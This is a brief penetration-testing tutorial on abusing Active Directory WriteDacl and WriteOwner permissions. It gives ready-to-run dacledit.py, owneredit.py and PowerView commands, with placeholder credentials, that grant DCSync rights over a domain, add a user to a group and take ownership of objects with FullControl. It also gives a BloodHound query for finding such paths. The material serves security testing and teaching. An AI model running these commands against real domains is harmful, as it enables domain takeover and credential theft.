Granting Rights and Ownership
Permissions such as WriteDacl
and Ownership
, play a crucial role in controlling access to objects and ensuring their security. The WriteDacl
access right refers to the privilege that allows an account to modify the DACL
of a target object. Ownership
on the other hand denotes the state of possessing administrative control over an object. Understanding the significance of these access rights is essential as they can impact the vulnerability and potential abuses associated with the manipulated DACL
.
If we possess an account with privileges to modify a target object's DACL we can use that account to edit the target's DACL and make it vulnerable to other attacks.
WriteDacl
Once we find an account with WriteDacl
or Ownership
over another object we can modify the DACLs to, for example, add DCSync permissions towards the entire domain
dacledit.py -principal otter -target-dn dc=domain,dc=com -dc-ip 10.10.10.10 domain.com/otter:'SomethingSecure123!' -action write -rights DCSync
Import-Module .\PowerView.ps1
Add-DomainObjectAcl -TargetIdentity $(Get-DomainSID) -PrincipalIdentity otter -Rights DCSync -Verbose
Another option would be adding ourselves to a group
dacledit.py -principal otter -target "Vulnerable Group" -dc-ip 10.10.10.10 domain.com/otter:'SomethingSecure123!'
Now we can add ourselves or another user to a group like we did in the AddMembers section.
WriteOwner
This DACL allows us to modify the owner
of the target object, specifically the OwnerSid
sub-attribute within the object's security descriptor
.
MATCH p=((n:User)-[r:WriteOwner]->(m)) RETURN p
With this kind of right we can perform a GPO attack. Specifically, we can abuse WriteOwner
by using owneredit
owneredit.py -action write -new-owner otter -target targetUser -dc-ip 10.10.10.10 domain.com/otter:'SomethingSecure123!'
usually this step is followed by changing the DACL of the new user to something like FullControl
dacledit.py -principal otter -target targetUser -action write -rights FullControl -dc-ip 10.10.10.10 domain.com/otter:'SomethingSecure123!'
From Windows we can do something similar
Set-DomainObjectOwner -Identity targetUser -OwnerIdentity otter -Verbose
Add-DomainObjectAcl -TargetIdentity targetUser -PrincipalIdentity otter -Rights All -Verbose
Last updated